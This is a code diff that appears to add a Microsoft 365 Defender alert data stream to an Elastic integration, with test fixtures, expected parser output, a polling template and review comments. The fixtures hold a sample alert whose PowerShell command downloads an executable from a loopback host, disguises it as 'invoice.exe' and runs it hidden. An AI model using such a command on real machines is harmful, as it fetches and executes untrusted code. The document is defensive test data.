"detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 5772, + "parentProcessId": 7408, + "processCommandLine": "\"cmd.exe\" ", + "processCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "parentProcessCreationDateTime": "2023-10-20T09:34:32.0067951Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "13e9bb7e85ff9b08c26a440412e5cd5d296c4d35", + "sha256": "423e0e810a69aaceba0e5670e58aff898cf0ebffab99ccb46ebb3464c3d2facb", + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "explorer.exe", + "filePath": "C:\\Windows", + "fileSize": 5261576, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], 
+ "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + } + ] + } + ] + } diff --git a/packages/m365_defender/_dev/deploy/docker/docker-compose.yml b/packages/m365_defender/_dev/deploy/docker/docker-compose.yml index 6aca3ac3d0a..1a38b428f30 100644 --- a/packages/m365_defender/_dev/deploy/docker/docker-compose.yml +++ b/packages/m365_defender/_dev/deploy/docker/docker-compose.yml 
@@ -26,3 +26,16 @@ services:
 - --exit-on-unmatched-rule
 - --addr=:8080
 - --config=/config.yml
+ m365-defender-alert-http:
+ image: docker.elastic.co/observability/stream:v0.13.0
+ ports:
+ - 8080
+ volumes:
+ - ./alert-http-mock-config.yml:/config.yml
+ environment:
+ PORT: 8080
+ command:
+ - http-server
+ - --exit-on-unmatched-rule
+ - --addr=:8080
+ - --config=/config.yml
diff --git a/packages/m365_defender/changelog.yml b/packages/m365_defender/changelog.yml
index 0dc27afd338..9d5e9d1e57e 100644
--- a/packages/m365_defender/changelog.yml
+++ b/packages/m365_defender/changelog.yml
@@ -1,4 +1,19 @@
 # newer versions go on top
+- version: "2.8.0"
+ changes:
+ - description: Set sensitive values as secret and fix incorrect mappings.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9127
+- version: "2.7.1"
+ changes:
+ - description: Handle invalid IP addresses.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9060
+- version: "2.7.0"
+ changes:
+ - description: Add support of Alert Data Stream.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8950
 - version: "2.6.2"
 changes:
 - description: Fix cursor value and query building for log data stream.
diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log
new file mode 100644
index 00000000000..f060082c795
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log
@@ -0,0 +1 @@ +{"id":"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1","providerAlertId":"efa1828b-dd4e-405c-8a3b-aa28596830dd_1","incidentId":"23","status":"new","severity":"medium","classification":null,"determination":null,"serviceSource":"microsoftDefenderForEndpoint","detectionSource":"microsoftDefenderForEndpoint","productName":"Microsoft Defender for Endpoint","detectorId":"7f1c3609-a3ff-40e2-995b-c01770161d68","tenantId":"3adb963c-8e61-48e8-a06d-6dbb0dacea39","title":"Suspicious PowerShell command line","description":"A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.","recommendedActions":"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. 
Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.","category":"Execution","assignedTo":null,"alertWebUrl":"https:\/\/security.microsoft.com\/alerts\/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39","incidentWebUrl":"https:\/\/security.microsoft.com\/incidents\/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39","actorDisplayName":null,"threatDisplayName":null,"threatFamilyName":null,"mitreTechniques":["T1059.001"],"createdDateTime":"2023-10-20T09:53:09.8839373Z","lastUpdateDateTime":"2023-10-20T09:54:07.5033333Z","resolvedDateTime":null,"firstActivityDateTime":"2023-10-20T09:51:39.5154802Z","lastActivityDateTime":"2023-10-20T09:51:41.9939003Z","alertPolicyId":null,"additionalData":null,"comments":[],"evidence":[{"@odata.type":"#microsoft.graph.security.deviceEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":["PrimaryDevice"],"tags":[],"firstSeenDateTime":"2023-10-20T09:50:17.7383987Z","mdeDeviceId":"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843","azureAdDeviceId":"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14","deviceDnsName":"clw555test","osPlatform":"Windows11","osBuild":22621,"version":"22H2","healthStatus":"inactive","riskScore":"high","rbacGroupId":0,"rbacGroupName":null,"onboardingStatus":"onboarded","defenderAvStatus":"notSupported","ipInterfaces":["192.168.5.65","fe80::cfe4:80b:615c:38fb","127.0.0.1","::1"],"vmMetadata":null,"loggedOnUsers":[{"accountName":"CDPUserIS-38411","domainName":"AzureAD"}]},{"@odata.type":"#microsoft.graph.security.userEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"userAccount":{"accountName":"CDPUserIS-38411","domainName":"AzureAD","userSid":"S-1-12-1-1485667349-1150190949-4065799612-2328216759","azureAdUserId":null,"userPr
incipalName":null,"displayName":null}},{"@odata.type":"#microsoft.graph.security.urlEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"suspicious","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"url":"http:\/\/127.0.0.1\/1.exe"},{"@odata.type":"#microsoft.graph.security.ipEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"suspicious","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"ipAddress":"127.0.0.1","countryLetterCode":null},{"@odata.type":"#microsoft.graph.security.processEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"processId":8224,"parentProcessId":5772,"processCommandLine":"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http:\/\/127.0.0.1\/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'","processCreationDateTime":"2023-10-20T09:51:39.4997961Z","parentProcessCreationDateTime":"2023-10-20T09:51:19.5064237Z","detectionStatus":"detected","mdeDeviceId":"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843","imageFile":{"sha1":"a72c41316307889e43fe8605a0dca4a72e72a011","sha256":"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80","fileName":"powershell.exe","filePath":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","fileSize":491520,"filePublisher":"Microsoft Corporation","signer":null,"issuer":null},"parentProcessImageFile":{"sha1":null,"sha256":null,"fileName":"cmd.exe","filePath":"C:\\Windows\\System32","fileSize":323584,"filePublisher":"Microsoft 
Corporation","signer":null,"issuer":null},"userAccount":{"accountName":"CDPUserIS-38411","domainName":"AzureAD","userSid":"S-1-12-1-1485667349-1150190949-4065799612-2328216759","azureAdUserId":null,"userPrincipalName":null,"displayName":null}}]} diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json new file mode 100644 index 00000000000..812c3928d5b --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json 
@@ -0,0 +1,270 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-20T09:54:07.503Z", + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "detected" + ], + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "kind": "alert", + "original": "{\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"status\":\"new\",\"severity\":\"medium\",\"classification\":null,\"determination\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"productName\":\"Microsoft Defender for Endpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"title\":\"Suspicious PowerShell command line\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. 
Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"category\":\"Execution\",\"assignedTo\":null,\"alertWebUrl\":\"https:\\/\\/security.microsoft.com\\/alerts\\/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"incidentWebUrl\":\"https:\\/\\/security.microsoft.com\\/incidents\\/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"actorDisplayName\":null,\"threatDisplayName\":null,\"threatFamilyName\":null,\"mitreTechniques\":[\"T1059.001\"],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"resolvedDateTime\":null,\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"alertPolicyId\":null,\"additionalData\":null,\"comments\":[],\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[\"PrimaryDevice\"],\"tags\":[],\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"deviceDnsName\":\"clw555test\",\"osPlatform\":\"Windows11\",\"osBuild\":22621,\"version\":\"22H2\",\"healthStatus\":\"inactive\",\"riskScore\":\"high\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"onboardingStatus\":\"onboarded\",\"defenderAvStatus\":\"notSupported\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"vmMetadata\":null,\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}]},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"n
one\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\",\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\",\"azureAdUserId\":null,\"userPrincipalName\":null,\"displayName\":null}},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"suspicious\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"url\":\"http:\\/\\/127.0.0.1\\/1.exe\"},{\"@odata.type\":\"#microsoft.graph.security.ipEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"suspicious\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"ipAddress\":\"127.0.0.1\",\"countryLetterCode\":null},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"processId\":8224,\"parentProcessId\":5772,\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http:\\/\\/127.0.0.1\\/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 
'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"detectionStatus\":\"detected\",\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"imageFile\":{\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"fileSize\":491520,\"filePublisher\":\"Microsoft Corporation\",\"signer\":null,\"issuer\":null},\"parentProcessImageFile\":{\"sha1\":null,\"sha256\":null,\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"fileSize\":323584,\"filePublisher\":\"Microsoft Corporation\",\"signer\":null,\"issuer\":null},\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\",\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\",\"azureAdUserId\":null,\"userPrincipalName\":null,\"displayName\":null}}]}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + 
"image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. 
Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml 
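Review bot: `related.hosts` in the expected document collects `Windows11`, `22H2` and `AzureAD` next to the device id and the DNS name `clw555test`; the OS platform, OS version and the account's domain are not host identifiers, and carrying them there makes every alert from any Windows 11 / Azure AD tenant pivot onto each other on `related.hosts`. Similarly `host.ip` holds only the `ipEvidence` address `127.0.0.1` while the device's `ip_interfaces` are left out, which is fine if intentional but worth a comment in the pipeline. The ingest pipeline that builds these fields is not in this chunk, so this is inferred from the expected output alone; if it appends the device evidence's `os_platform`, `version` and the account's `domain_name` to `related.hosts` wholesale, those three should be dropped from that list and this fixture regenerated.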
@@ -0,0 +1,4 @@
+fields:
+ tags:
+ - preserve_original_event
+ - preserve_duplicate_custom_fields
diff --git a/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml b/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml
new file mode 100644
index 00000000000..0cca3f53c76
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml
@@ -0,0 +1,15 @@
+input: httpjson
+service: m365-defender-alert-http
+vars:
+ login_url: http://{{Hostname}}:{{Port}}
+ client_id: xxxx
+ client_secret: xxxx
+ tenant_id: tenant_id
+data_stream:
+ vars:
+ request_url: http://{{Hostname}}:{{Port}}
+ preserve_original_event: true
+ preserve_duplicate_custom_fields: true
+ batch_size: 2
+assert:
+ hit_count: 3
diff --git a/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..3c18301e8fd
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,65 @@
+config_version: 2
+interval: {{interval}}
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+request.tracer.maxbackups: 5
+{{/if}}
+auth.oauth2.client.id: {{client_id}}
+auth.oauth2.client.secret: {{client_secret}}
+auth.oauth2.token_url: {{login_url}}/{{tenant_id}}/oauth2/v2.0/token
+auth.oauth2.scopes: {{request_url}}/.default
+request.url: {{request_url}}/v1.0/security/alerts_v2
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+request.transforms:
+ - set:
+ target: url.params.$top
+ value: {{batch_size}}
+ - set:
+ target: url.params.$skip
+ value: 0
+ - set:
+ target: url.params.$filter
+ value: 'lastUpdateDateTime ge [[.cursor.last_update_time]]'
+ default: 'lastUpdateDateTime ge [[formatDate (now (parseDuration "-{{initial_interval}}"))]]'
+ - set:
+ target: url.params.$orderby
+ value: 'lastUpdateDateTime asc'
+response.pagination:
+ - set:
+ target: url.params.$filter
+ value: '[[.last_response.url.params.Get "$filter"]]'
+ fail_on_template_error: true
+ - set:
+ target: url.params.$skip
+ value: '[[if (eq (len .last_response.body.value) {{batch_size}})]][[add (toInt (.last_response.url.params.Get "$skip")) {{batch_size}}]][[end]]'
+ fail_on_template_error: true
+response.split:
+ target: body.value
+cursor:
+ last_update_time:
+ value: '[[.last_event.lastUpdateDateTime]]'
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
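Review bot: `auth.oauth2.client.secret: {{client_secret}}` (and the `client_id` / `proxy_url` lines) renders the operator-supplied value as an unquoted YAML plain scalar, so a secret that begins with a YAML indicator such as `*`, `&`, `!`, `@` or `` ` ``, or that contains `: ` or ` #`, will either make the rendered input config invalid or be silently truncated at the comment marker. The cheap guard is to quote the expansion, `auth.oauth2.client.secret: "{{client_secret}}"`, accepting that a value containing `"` or `\` would still need escaping, which I cannot confirm this template engine performs. Separately, `$skip`-based paging over results ordered by `lastUpdateDateTime asc` can miss an alert that is updated while a run is in progress, because rows shift between pages; if the endpoint returns a next-page link, paging on that would be more robust, though whether it does is not visible here.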
